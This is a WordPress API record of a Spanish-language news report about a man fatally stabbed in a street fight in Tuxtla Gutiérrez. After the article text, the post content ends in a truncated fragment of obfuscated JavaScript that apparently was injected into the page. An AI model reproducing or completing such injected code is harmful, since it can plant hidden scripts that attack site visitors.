{"id":8087,"date":"2023-01-16T02:51:13","date_gmt":"2023-01-16T02:51:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8087"},"modified":"2023-01-16T02:51:13","modified_gmt":"2023-01-16T02:51:13","slug":"asesinan-a-cuchilladas-a-sujeto-durante-rina-en-la-via-publica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8087","title":{"rendered":"Asesinan a cuchilladas a sujeto durante ri\u00f1a en la v\u00eda p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230115-WA0029-1024x577.jpg\" alt=\"\" class=\"wp-image-8084\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230115-WA0029-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230115-WA0029-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230115-WA0029-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230115-WA0029-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230115-WA0029.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 15 de enero del 2023. Tuxtla Guti\u00e9rrez.- Un hombre perdi\u00f3 la vida cuando fue atacado a cuchilladas en la v\u00eda p\u00fablica cuando participaba en una pelea.<\/p>\n\n\n\n<p>Los reportes sobre este hecho informaron que Vict\u00f3rico de 47 a\u00f1os de edad caminaba sobre la Avenida La Floresta, frente al fraccionamiento La Toscana cuando se le acercaron dos hombres y comenzaron a golpearlo.<\/p>\n\n\n\n<p>Al defenderse uno de los agresores sac\u00f3 un cuchillo y le asest\u00f3 cuatro estocadas.<\/p>\n\n\n\n<p>La v\u00edctima se desvaneci\u00f3 cayendo al piso.<\/p>\n\n\n\n<p>Testigos relataron que los agresores escaparon del lugar a bordo de un Chevy de color negro con vidrios polarizados rumbo a la zona Sur de la ciudad.<\/p>\n\n\n\n<p>Param\u00e9dicos de Protecci\u00f3n Civil Municipal arribaron para atender al herido pero nada pudieron hacer pues hab\u00eda muerto.<\/p>\n\n\n\n<p>Elementos de diferentes corporaciones polic\u00edacas montaron un fuerte operativo de b\u00fasqueda sin obtener resultados positivos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 15 de enero del 2023. Tuxtla Guti\u00e9rrez.- Un hombre perdi\u00f3 la vida cuando fue atacado a cuchilladas en la v\u00eda p\u00fablica cuando participaba en una pelea. Los reportes sobre este hecho informaron que Vict\u00f3rico de 47 a\u00f1os de edad caminaba sobre la Avenida La Floresta, frente al fraccionamiento La Toscana cuando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8084,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8087","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8087","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8087"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8087\/revisions"}],"predecessor-version":[{"id":8088,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8087\/revisions\/8088"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8084"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8087"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8087"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8087"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}